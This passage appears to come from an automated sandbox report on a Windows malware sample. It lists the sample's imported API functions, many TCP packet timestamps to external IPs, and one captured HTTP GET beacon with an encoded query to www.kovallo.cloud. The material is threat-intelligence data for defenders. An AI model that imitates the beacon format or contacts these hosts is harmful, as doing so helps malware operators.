                                ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, 
SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Sep 23, 2024 14:38:09.970050097 CEST4972180192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:09.974891901 CEST8049721162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:09.975022078 CEST4972180192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:09.988609076 CEST4972180192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:09.995902061 CEST8049721162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:10.578469992 CEST8049721162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:10.578643084 CEST8049721162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:10.578766108 CEST4972180192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:11.498270988 CEST4972180192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:12.517339945 CEST4972280192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:12.522440910 CEST8049722162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:12.522545099 CEST4972280192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:12.534504890 CEST4972280192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:12.539510965 CEST8049722162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:13.137239933 CEST8049722162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:13.137253046 CEST8049722162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:13.137367964 CEST4972280192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:14.045295954 CEST4972280192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:15.104504108 CEST4972380192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:15.109427929 CEST8049723162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:15.110040903 CEST4972380192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:15.120706081 CEST4972380192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:15.125616074 CEST8049723162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:15.125657082 CEST8049723162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:15.731651068 CEST8049723162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:15.731683969 CEST8049723162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:15.731792927 CEST4972380192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:16.623856068 CEST4972380192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:17.641969919 CEST4972480192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:17.647619009 CEST8049724162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:17.647839069 CEST4972480192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:17.654906988 CEST4972480192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:17.660588980 CEST8049724162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:18.235691071 CEST8049724162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:18.235717058 CEST8049724162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:18.235963106 CEST4972480192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:18.289978981 CEST4972480192.168.2.7162.0.238.246
                                Sep 23, 2024 14:38:18.294856071 CEST8049724162.0.238.246192.168.2.7
                                Sep 23, 2024 14:38:24.140660048 CEST4972580192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:24.231765985 CEST8049725198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:24.231882095 CEST4972580192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:24.603214025 CEST4972580192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:24.608112097 CEST8049725198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:24.704749107 CEST8049725198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:24.704834938 CEST4972580192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:26.107610941 CEST4972580192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:26.112531900 CEST8049725198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:27.126442909 CEST4972680192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:27.131356001 CEST8049726198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:27.132343054 CEST4972680192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:27.142273903 CEST4972680192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:27.147270918 CEST8049726198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:27.900202036 CEST8049726198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:27.900283098 CEST4972680192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:27.902126074 CEST8049726198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:27.902297020 CEST4972680192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:28.654490948 CEST4972680192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:28.659393072 CEST8049726198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:29.673584938 CEST4972780192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:29.678570986 CEST8049727198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:29.678654909 CEST4972780192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:29.694057941 CEST4972780192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:29.698967934 CEST8049727198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:29.698998928 CEST8049727198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:30.166430950 CEST8049727198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:30.166579962 CEST4972780192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:31.201375961 CEST4972780192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:31.206427097 CEST8049727198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:32.221959114 CEST4972880192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:32.227015972 CEST8049728198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:32.227114916 CEST4972880192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:32.234188080 CEST4972880192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:32.239474058 CEST8049728198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:32.686242104 CEST8049728198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:32.686553001 CEST4972880192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:32.690695047 CEST4972880192.168.2.7198.50.252.64
                                Sep 23, 2024 14:38:32.695501089 CEST8049728198.50.252.64192.168.2.7
                                Sep 23, 2024 14:38:37.824707031 CEST4972980192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:37.829579115 CEST804972985.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:37.829657078 CEST4972980192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:37.842024088 CEST4972980192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:37.846935034 CEST804972985.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:39.360229015 CEST4972980192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:39.423636913 CEST804972985.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:39.423821926 CEST4972980192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:40.376848936 CEST4973080192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:40.943958044 CEST804973085.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:40.944211006 CEST4973080192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:40.958497047 CEST4973080192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:40.963371038 CEST804973085.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:42.467298985 CEST4973080192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:42.473690033 CEST804973085.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:42.475876093 CEST4973080192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:43.486629009 CEST4973180192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:43.491631985 CEST804973185.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:43.491746902 CEST4973180192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:43.504518032 CEST4973180192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:43.509422064 CEST804973185.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:43.509517908 CEST804973185.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:45.014147997 CEST4973180192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:45.023439884 CEST804973185.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:45.023593903 CEST4973180192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:46.032567978 CEST4973280192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:46.038547039 CEST804973285.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:46.038664103 CEST4973280192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:46.046056986 CEST4973280192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:46.051697016 CEST804973285.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:46.718200922 CEST804973285.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:46.718302011 CEST804973285.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:46.718566895 CEST4973280192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:46.721079111 CEST4973280192.168.2.785.159.66.93
                                Sep 23, 2024 14:38:46.726049900 CEST804973285.159.66.93192.168.2.7
                                Sep 23, 2024 14:38:51.919599056 CEST4973380192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:51.924546003 CEST8049733142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:51.924633980 CEST4973380192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:51.937959909 CEST4973380192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:51.942893028 CEST8049733142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:52.646972895 CEST8049733142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:52.647694111 CEST8049733142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:52.649878979 CEST4973380192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:53.451558113 CEST4973380192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:54.471508980 CEST4973480192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:54.476727009 CEST8049734142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:54.476826906 CEST4973480192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:54.494962931 CEST4973480192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:54.500483036 CEST8049734142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:55.444797993 CEST8049734142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:55.444818974 CEST8049734142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:55.445163012 CEST4973480192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:55.445350885 CEST8049734142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:55.447992086 CEST4973480192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:55.998727083 CEST4973480192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:57.017090082 CEST4973580192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:57.022075891 CEST8049735142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:57.022460938 CEST4973580192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:57.032861948 CEST4973580192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:57.037863970 CEST8049735142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:57.037889957 CEST8049735142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:57.758460999 CEST8049735142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:57.758891106 CEST8049735142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:57.763962030 CEST4973580192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:58.545305014 CEST4973580192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:59.618372917 CEST4973680192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:59.623358965 CEST8049736142.250.186.51192.168.2.7
                                Sep 23, 2024 14:38:59.623492002 CEST4973680192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:59.632251978 CEST4973680192.168.2.7142.250.186.51
                                Sep 23, 2024 14:38:59.637139082 CEST8049736142.250.186.51192.168.2.7
                                Sep 23, 2024 14:39:00.363027096 CEST8049736142.250.186.51192.168.2.7
                                Sep 23, 2024 14:39:00.365102053 CEST8049736142.250.186.51192.168.2.7
                                Sep 23, 2024 14:39:00.365211964 CEST4973680192.168.2.7142.250.186.51
                                Sep 23, 2024 14:39:00.366449118 CEST4973680192.168.2.7142.250.186.51
                                Sep 23, 2024 14:39:00.371210098 CEST8049736142.250.186.51192.168.2.7
                                Sep 23, 2024 14:39:13.527122021 CEST4973780192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:13.531982899 CEST8049737199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:13.532172918 CEST4973780192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:13.543255091 CEST4973780192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:13.548130035 CEST8049737199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:14.931289911 CEST8049737199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:14.931310892 CEST8049737199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:14.931318998 CEST8049737199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:14.931333065 CEST8049737199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:14.931401968 CEST4973780192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:14.931430101 CEST4973780192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:14.931551933 CEST8049737199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:14.931598902 CEST4973780192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:14.931922913 CEST8049737199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:14.931977987 CEST4973780192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:15.045388937 CEST4973780192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:16.064512014 CEST4973880192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:16.069436073 CEST8049738199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:16.069643974 CEST4973880192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:16.081939936 CEST4973880192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:16.087724924 CEST8049738199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:16.524482012 CEST8049738199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:16.524501085 CEST8049738199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:16.524524927 CEST8049738199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:16.524563074 CEST4973880192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:16.524602890 CEST4973880192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:17.592272043 CEST4973880192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:18.611244917 CEST4973980192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:18.616244078 CEST8049739199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:18.616364956 CEST4973980192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:18.629132032 CEST4973980192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:18.634094000 CEST8049739199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:18.634135008 CEST8049739199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:19.083872080 CEST8049739199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:19.083887100 CEST8049739199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:19.083897114 CEST8049739199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:19.088135004 CEST4973980192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:20.138998985 CEST4973980192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:21.158241034 CEST4974080192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:21.163233042 CEST8049740199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:21.163340092 CEST4974080192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:21.172652960 CEST4974080192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:21.177500963 CEST8049740199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:21.619105101 CEST8049740199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:21.619121075 CEST8049740199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:21.619137049 CEST8049740199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:21.619286060 CEST4974080192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:21.621992111 CEST4974080192.168.2.7199.59.243.227
                                Sep 23, 2024 14:39:21.626934052 CEST8049740199.59.243.227192.168.2.7
                                Sep 23, 2024 14:39:26.680619955 CEST4974180192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:26.685534954 CEST804974162.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:26.685614109 CEST4974180192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:26.701318979 CEST4974180192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:26.706113100 CEST804974162.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:27.378319025 CEST804974162.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:27.378333092 CEST804974162.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:27.378353119 CEST804974162.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:27.378359079 CEST804974162.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:27.378366947 CEST804974162.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:27.378374100 CEST804974162.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:27.378470898 CEST4974180192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:27.378470898 CEST4974180192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:28.217263937 CEST4974180192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:29.235876083 CEST4974280192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:29.240967035 CEST804974262.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:29.241121054 CEST4974280192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:29.251688004 CEST4974280192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:29.256486893 CEST804974262.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:29.906673908 CEST804974262.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:29.906691074 CEST804974262.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:29.906694889 CEST804974262.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:29.906776905 CEST804974262.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:29.906783104 CEST804974262.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:29.906790972 CEST804974262.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:29.906817913 CEST4974280192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:29.906860113 CEST4974280192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:30.765649080 CEST4974280192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:31.783899069 CEST4974380192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:31.788954973 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:31.789422989 CEST4974380192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:31.799983025 CEST4974380192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:31.804809093 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:31.804985046 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:32.458868027 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:32.458894968 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:32.458914042 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:32.458934069 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:32.458947897 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:32.458952904 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:32.458952904 CEST4974380192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:32.458962917 CEST804974362.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:32.458987951 CEST4974380192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:32.459009886 CEST4974380192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:33.311105967 CEST4974380192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:34.385787964 CEST4974480192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:34.390614986 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:34.390700102 CEST4974480192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:34.409079075 CEST4974480192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:34.413933992 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:35.074392080 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:35.074445009 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:35.074450016 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:35.074466944 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:35.074480057 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:35.074487925 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:35.074590921 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:35.074652910 CEST4974480192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:35.074755907 CEST4974480192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:35.081902027 CEST4974480192.168.2.762.149.128.40
                                Sep 23, 2024 14:39:35.086786985 CEST804974462.149.128.40192.168.2.7
                                Sep 23, 2024 14:39:40.125778913 CEST4974580192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:40.130733013 CEST80497453.33.130.190192.168.2.7
                                Sep 23, 2024 14:39:40.130897999 CEST4974580192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:40.142749071 CEST4974580192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:40.147638083 CEST80497453.33.130.190192.168.2.7
                                Sep 23, 2024 14:39:40.589591026 CEST80497453.33.130.190192.168.2.7
                                Sep 23, 2024 14:39:40.589679956 CEST4974580192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:41.654860973 CEST4974580192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:41.663131952 CEST80497453.33.130.190192.168.2.7
                                Sep 23, 2024 14:39:42.674371958 CEST4974680192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:42.679447889 CEST80497463.33.130.190192.168.2.7
                                Sep 23, 2024 14:39:42.679861069 CEST4974680192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:42.692054987 CEST4974680192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:42.697058916 CEST80497463.33.130.190192.168.2.7
                                Sep 23, 2024 14:39:44.067357063 CEST80497463.33.130.190192.168.2.7
                                Sep 23, 2024 14:39:44.067449093 CEST4974680192.168.2.73.33.130.190
                                Sep 23, 2024 14:39:44.201806068 CEST4974680192.168.2.73.33.130.190
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49703 | 81.2.196.19 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
Timestamp | Bytes transferred | Direction | Data
Sep 23, 2024 14:36:56.753988028 CEST | 478 | OUT | GET /ye3m/?mtJD_=fvdlJ2L&76=BO45+0u1emCE8p481TGhlGJRfjijEniKMfSBNkuCyA4PSNUX9OtmTTSsRjXRpS6xcva9ZoEmbKYu7sV13UJQ2VHV0V6wg3gLfDQvPBhIAhk7jspRbUMiRCt8g415t+g4yzmjfyP2O5kn HTTP/1.1
Host: www.kovallo.cloud
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
